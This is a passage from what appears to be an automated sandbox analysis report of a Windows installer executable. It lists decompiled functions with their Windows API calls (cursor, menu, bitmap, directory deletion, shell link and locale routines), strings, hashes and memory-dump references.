                                                                              • Part of subcall function 00416380: UnregisterClassA.USER32(?,00400000), ref: 0041641B
                                                                              • Part of subcall function 00416380: RegisterClassA.USER32(?), ref: 0041643E
                                                                            • GetVersion.KERNEL32 ref: 0045F360
                                                                            • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 0045F39E
                                                                            • SHGetFileInfo.SHELL32(0045F43C,00000000,?,00000160,00004011), ref: 0045F3BB
                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 0045F3D9
                                                                            • SetCursor.USER32(00000000,00000000,00007F02,0045F43C,00000000,?,00000160,00004011), ref: 0045F3DF
                                                                            • SetCursor.USER32(?,0045F41F,00007F02,0045F43C,00000000,?,00000160,00004011), ref: 0045F412
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                            • String ID: Explorer
                                                                            • API String ID: 2594429197-512347832
                                                                            • Opcode ID: 5c897608954e0c34f46d57c9c9468377b08e724fc1c9a15d7250c0687c3dca48
                                                                            • Instruction ID: 84e95c20810325967785af02823865f4c58c42daffe30e25327ba0847e04abb2
                                                                            • Opcode Fuzzy Hash: 5c897608954e0c34f46d57c9c9468377b08e724fc1c9a15d7250c0687c3dca48
                                                                            • Instruction Fuzzy Hash: 01213A707803046AE710BB769C47F9B36889B0A709F4144BFBF05EA2C3CA7D8C09866D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401A90 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlEnterCriticalSection.KERNEL32(00494420,00000000,00401B68), ref: 00401ABD
                                                                            • LocalFree.KERNEL32(007639F0,00000000,00401B68), ref: 00401ACF
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,007639F0,00000000,00401B68), ref: 00401AEE
                                                                            • LocalFree.KERNEL32(00761CF8,?,00000000,00008000,007639F0,00000000,00401B68), ref: 00401B2D
                                                                            • RtlLeaveCriticalSection.KERNEL32(00494420,00401B6F), ref: 00401B58
                                                                            • RtlDeleteCriticalSection.KERNEL32(00494420,00401B6F), ref: 00401B62
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                            • String ID: ,#v
                                                                            • API String ID: 3782394904-3386492414
                                                                            • Opcode ID: ca3664eef181b3c450eb25f8da65eda267e6af06c45086156d65a8afb80b51bf
                                                                            • Instruction ID: e723898d31bd980d44dc420abd38e4993862ec3455be7bfe2ac2130caf5f6e99
                                                                            • Opcode Fuzzy Hash: ca3664eef181b3c450eb25f8da65eda267e6af06c45086156d65a8afb80b51bf
                                                                            • Instruction Fuzzy Hash: 9D11BF30A003405AEB15AB65EC82F263BE497E570CF44007BF50067AF1D77C9842C76E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00458160 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,004582E2,?,00000000,00000000,00000000,?,00000006,?,00000000,00491717,?,00000000,004917BA), ref: 00458226
                                                                              • Part of subcall function 00452C34: FindClose.KERNEL32(000000FF,00452D2A), ref: 00452D19
                                                                            Strings
                                                                            • Failed to strip read-only attribute., xrefs: 004581F4
                                                                            • Failed to delete directory (%d). Will retry later., xrefs: 0045823F
                                                                            • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00458200
                                                                            • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 0045829B
                                                                            • Deleting directory: %s, xrefs: 004581AF
                                                                            • Stripped read-only attribute., xrefs: 004581E8
                                                                            • Failed to delete directory (%d)., xrefs: 004582BC
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseErrorFindLast
                                                                            • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                            • API String ID: 754982922-1448842058
                                                                            • Opcode ID: 86182c70a77fd2d711cf7b3f935fad52ad940f5dc0f2bb935dd50f6a8db30579
                                                                            • Instruction ID: a7040656d29ea07138429a65227d1fe8661808dade238f8de5d3983c6959866f
                                                                            • Opcode Fuzzy Hash: 86182c70a77fd2d711cf7b3f935fad52ad940f5dc0f2bb935dd50f6a8db30579
                                                                            • Instruction Fuzzy Hash: DE41A630A046499ACB00DBA984453BF7AA59B49306F5085BFBC11FB393CF7C890D875E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00422DC0 Relevance: 12.1, APIs: 8, Instructions: 119windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCapture.USER32 ref: 00422E14
                                                                            • GetCapture.USER32 ref: 00422E23
                                                                            • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422E29
                                                                            • ReleaseCapture.USER32 ref: 00422E2E
                                                                            • GetActiveWindow.USER32 ref: 00422E3D
                                                                            • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422EBC
                                                                            • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422F20
                                                                            • GetActiveWindow.USER32 ref: 00422F2F
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                            • String ID:
                                                                            • API String ID: 862346643-0
                                                                            • Opcode ID: 712e39948fd123bd0944784c1e4209bda02e8cd1285bd6ba2bce8578b7203805
                                                                            • Instruction ID: 6da1d0135b9d11ce9028ca126f5481e792b9d420ac57a31bdf33f6cc8c40a84a
                                                                            • Opcode Fuzzy Hash: 712e39948fd123bd0944784c1e4209bda02e8cd1285bd6ba2bce8578b7203805
                                                                            • Instruction Fuzzy Hash: 83414370B00254AFDB10EBA9DA46B9D77F1EF45304F5540BAF404AB3A2D7B89E41DB18
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004293F0 Relevance: 12.1, APIs: 8, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • 73A0A570.USER32(00000000), ref: 004293FA
                                                                            • GetTextMetricsA.GDI32(00000000), ref: 00429403
                                                                              • Part of subcall function 0041A158: CreateFontIndirectA.GDI32(?), ref: 0041A217
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00429412
                                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 0042941F
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00429426
                                                                            • 73A0A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0042942E
                                                                            • GetSystemMetrics.USER32(00000006), ref: 00429453
                                                                            • GetSystemMetrics.USER32(00000006), ref: 0042946D
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                            • String ID:
                                                                            • API String ID: 361401722-0
                                                                            • Opcode ID: b2aa10e7b7089fe9610b7b0ad8d25b91e96a29c2a8d1cae1ffdab2385f8086cd
                                                                            • Instruction ID: 2396e8ac942ab906a208d8077257e147ebb5126c2b98df3f18c4b625c9a01c14
                                                                            • Opcode Fuzzy Hash: b2aa10e7b7089fe9610b7b0ad8d25b91e96a29c2a8d1cae1ffdab2385f8086cd
                                                                            • Instruction Fuzzy Hash: 3D0104917087103BF710B2B69CC2F6B6188DB9435DF44013FFA469A3D3D56C8C45866A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041DD94 Relevance: 12.1, APIs: 8, Instructions: 60windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • 73A0A570.USER32(00000000,?,00418FC9,0049295D), ref: 0041DD97
                                                                            • 73A14620.GDI32(00000000,0000005A,00000000,?,00418FC9,0049295D), ref: 0041DDA1
                                                                            • 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00418FC9,0049295D), ref: 0041DDAE
                                                                            • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DDBD
                                                                            • GetStockObject.GDI32(00000007), ref: 0041DDCB
                                                                            • GetStockObject.GDI32(00000005), ref: 0041DDD7
                                                                            • GetStockObject.GDI32(0000000D), ref: 0041DDE3
                                                                            • LoadIconA.USER32(00000000,00007F00), ref: 0041DDF4
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectStock$A14620A480A570IconLoad
                                                                            • String ID:
                                                                            • API String ID: 2920975243-0
                                                                            • Opcode ID: a00a97ecbf7073f89d6e04e837562f06262f280598315b13768e927efd87297b
                                                                            • Instruction ID: 26d2215c38f7902349b80dbd4a09bdf013e3c627cae683e10812a8645452cf50
                                                                            • Opcode Fuzzy Hash: a00a97ecbf7073f89d6e04e837562f06262f280598315b13768e927efd87297b
                                                                            • Instruction Fuzzy Hash: 381160B06403415AE700BF659892FA63790DBA5709F00813FF208AF2D2CB7E0C058B5E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0045F740 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 0045F844
                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00000000,0045F8D9), ref: 0045F84A
                                                                            • SetCursor.USER32(?,0045F8C1,00007F02,00000000,0045F8D9), ref: 0045F8B4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$Load
                                                                            • String ID: $ $Internal error: Item already expanding
                                                                            • API String ID: 1675784387-1948079669
                                                                            • Opcode ID: 374c6eee6dd7c05d3ed29aecb3c07f8607bfbe119cdd536ef1ba66e3ece505ba
                                                                            • Instruction ID: bc19f93f64f4cfd3b6c64fbb5e4444054adc2e78d3f14390eea5280ae24d604a
                                                                            • Opcode Fuzzy Hash: 374c6eee6dd7c05d3ed29aecb3c07f8607bfbe119cdd536ef1ba66e3ece505ba
                                                                            • Instruction Fuzzy Hash: BAB16B34A006449FDB10DF69C585B9ABBF5AF04305F2484BAEC499B793C778AD4CCB1A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00452590 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 225COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00452677
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringWrite
                                                                            • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                            • API String ID: 390214022-3304407042
                                                                            • Opcode ID: 17577b0f8582e5cf7f857e8520d0c40de0327dd1c60d8c6587b1496694d50cfd
                                                                            • Instruction ID: abf6614f95991f047cbf872b8675d76fa93f36fd66684b0017750e1831af6413
                                                                            • Opcode Fuzzy Hash: 17577b0f8582e5cf7f857e8520d0c40de0327dd1c60d8c6587b1496694d50cfd
                                                                            • Instruction Fuzzy Hash: DB910174A002099BDF01EFA5D942BDEB7B5AF49305F50816BE800B7396D7B85E09CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004549F8 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 178COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • 76CCE550.OLE32(00493A3C,00000000,00000001,00493774,?,00000000,00454BEE), ref: 00454A34
                                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                            • 76CCE550.OLE32(00493764,00000000,00000001,00493774,?,00000000,00454BEE), ref: 00454A58
                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00454BB3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: E550String$AllocByteCharFreeMultiWide
                                                                            • String ID: CoCreateInstance$IPersistFile::Save$IShellLink::QueryInterface
                                                                            • API String ID: 2757340368-615220198
                                                                            • Opcode ID: 10b61ca11c913b85dd018bfca0bd87c493ce64892769d21c1277a1ff95bb23bd
                                                                            • Instruction ID: e28da0ffaceb01cee804717922773e9a91ffd05ea7c596c2a735a488419d39cb
                                                                            • Opcode Fuzzy Hash: 10b61ca11c913b85dd018bfca0bd87c493ce64892769d21c1277a1ff95bb23bd
                                                                            • Instruction Fuzzy Hash: 14513371A40105AFDB40DFA9C885F9E7BF8EF4970AF014066B904EB252DB78ED48CB19
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00408688 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,004088D0,?,?,?,?,00000000,00000000,00000000,?,004098D7,00000000,004098EA), ref: 004086A2
                                                                              • Part of subcall function 004084D0: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,004944C0,00000001,?,0040859B,?,00000000,0040867A), ref: 004084EE
                                                                              • Part of subcall function 0040851C: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040871E,?,?,?,00000000,004088D0), ref: 0040852F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: InfoLocale$DefaultSystem
                                                                            • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                            • API String ID: 1044490935-665933166
                                                                            • Opcode ID: 9362ec8491f342d5e9289923679bf7722b3cc2aaffa74b6a8b68c84bdd1720ec
                                                                            • Instruction ID: bc7079e0a6f451a0b148bd409c2e0f1595c2818476049878c3843938bdef3741
                                                                            • Opcode Fuzzy Hash: 9362ec8491f342d5e9289923679bf7722b3cc2aaffa74b6a8b68c84bdd1720ec
                                                                            • Instruction Fuzzy Hash: EB514B34B002486BDB00FAA6C941B9F77A9DB94308F50D47FA141BB3C6CA3DCA06971D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00411664 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetVersion.KERNEL32(00000000,00411869), ref: 004116FC
                                                                            • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 004117BA
                                                                              • Part of subcall function 00411A1C: CreatePopupMenu.USER32 ref: 00411A36
                                                                            • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 00411846
                                                                              • Part of subcall function 00411A1C: CreateMenu.USER32 ref: 00411A40
                                                                            • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 0041182D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                            • String ID: ,$?
                                                                            • API String ID: 2359071979-2308483597
                                                                            • Opcode ID: a4330348a8b5add72bb88b34234a092f9c4bcb0268f2a71967034c917c80e18f
                                                                            • Instruction ID: 4e4ae47f8a98248c410fe7f22b452c6d5eef6af5e50a3601a7d5a52227d6b5a7
                                                                            • Opcode Fuzzy Hash: a4330348a8b5add72bb88b34234a092f9c4bcb0268f2a71967034c917c80e18f
                                                                            • Instruction Fuzzy Hash: 91510774A00141ABDB10EF6ADC816DA7BF9AF09304B1585BBF904E73A6D738DE41CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041BDD3 Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 0041BE98
                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 0041BEA7
                                                                            • GetBitmapBits.GDI32(?,?,?), ref: 0041BEF8
                                                                            • GetBitmapBits.GDI32(?,?,?), ref: 0041BF06
                                                                            • DeleteObject.GDI32(?), ref: 0041BF0F
                                                                            • DeleteObject.GDI32(?), ref: 0041BF18
                                                                            • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BF35
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                            • String ID:
                                                                            • API String ID: 1030595962-0
                                                                            • Opcode ID: def8fbccf1c24a02d994da4c86886dac4c2dead876cc1f6ae6625c60910ee1ab
                                                                            • Instruction ID: df24cebc7fa487ee98114de19092ccc5a22b1f53c044ef6357ba81a281e40f4e
                                                                            • Opcode Fuzzy Hash: def8fbccf1c24a02d994da4c86886dac4c2dead876cc1f6ae6625c60910ee1ab
                                                                            • Instruction Fuzzy Hash: A4510571E00219AFCB14DFA9D8819EEB7F9EF48314B10446AF914E7391D738AD81CB64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041CE48 Relevance: 10.7, APIs: 7, Instructions: 152windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CE6E
                                                                            • 73A14620.GDI32(00000000,00000026), ref: 0041CE8D
                                                                            • 73A08830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CEF3
                                                                            • 73A022A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CF02
                                                                            • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CF6C
                                                                            • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041CFAA
                                                                            • 73A08830.GDI32(?,?,00000001,0041CFDC,00000000,00000026), ref: 0041CFCF
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Stretch$A08830$A022A14620BitsMode
                                                                            • String ID:
                                                                            • API String ID: 2733548868-0
                                                                            • Opcode ID: f1e44e616a31fadfa248c6df7b1b8cee01c2aa03eac239bf1acaf6848e72f817
                                                                            • Instruction ID: 0295d75a013be80ecc2d975aeb153abe1d20fbb24d7cab5e263b7fb8805ed029
                                                                            • Opcode Fuzzy Hash: f1e44e616a31fadfa248c6df7b1b8cee01c2aa03eac239bf1acaf6848e72f817
                                                                            • Instruction Fuzzy Hash: 6A512970644600AFDB14DFA8C985FABBBF9AF08304F10459AF544DB292C778ED80CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00455190 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageA.USER32(00000000,?,?), ref: 004551E2
                                                                              • Part of subcall function 004241EC: GetWindowTextA.USER32(?,?,00000100), ref: 0042420C
                                                                              • Part of subcall function 0041EE14: GetCurrentThreadId.KERNEL32 ref: 0041EE63
                                                                              • Part of subcall function 0041EE14: 73A15940.USER32(00000000,0041EDC4,00000000,00000000,0041EE80,?,00000000,0041EEB7,?,0042E804,?,00000001), ref: 0041EE69
                                                                              • Part of subcall function 00424234: SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00455249
                                                                            • TranslateMessage.USER32(?), ref: 00455267
                                                                            • DispatchMessageA.USER32(?), ref: 00455270
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Message$TextWindow$A15940CurrentDispatchSendThreadTranslate
                                                                            • String ID: [Paused]
                                                                            • API String ID: 1715372110-4230553315
                                                                            • Opcode ID: c756cc2506f3dbf4f4bb9941ae66d94f60b4aee530b10c6c59ca1a5cc46b1d7b
                                                                            • Instruction ID: f2f6b487c86353f72898e4c8af60e590ce20add486516cec5e8e630063df4c80
                                                                            • Opcode Fuzzy Hash: c756cc2506f3dbf4f4bb9941ae66d94f60b4aee530b10c6c59ca1a5cc46b1d7b
                                                                            • Instruction Fuzzy Hash: 5731C3319086486ECB01DBB5DC51FEEBBB8EB49314F5140B7F800E3692D67C990ACB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004671DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCursor.USER32(00000000,0046731B), ref: 00467298
                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 004672A6
                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046731B), ref: 004672AC
                                                                            • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046731B), ref: 004672B6
                                                                            • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046731B), ref: 004672BC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$LoadSleep
                                                                            • String ID: CheckPassword
                                                                            • API String ID: 4023313301-1302249611
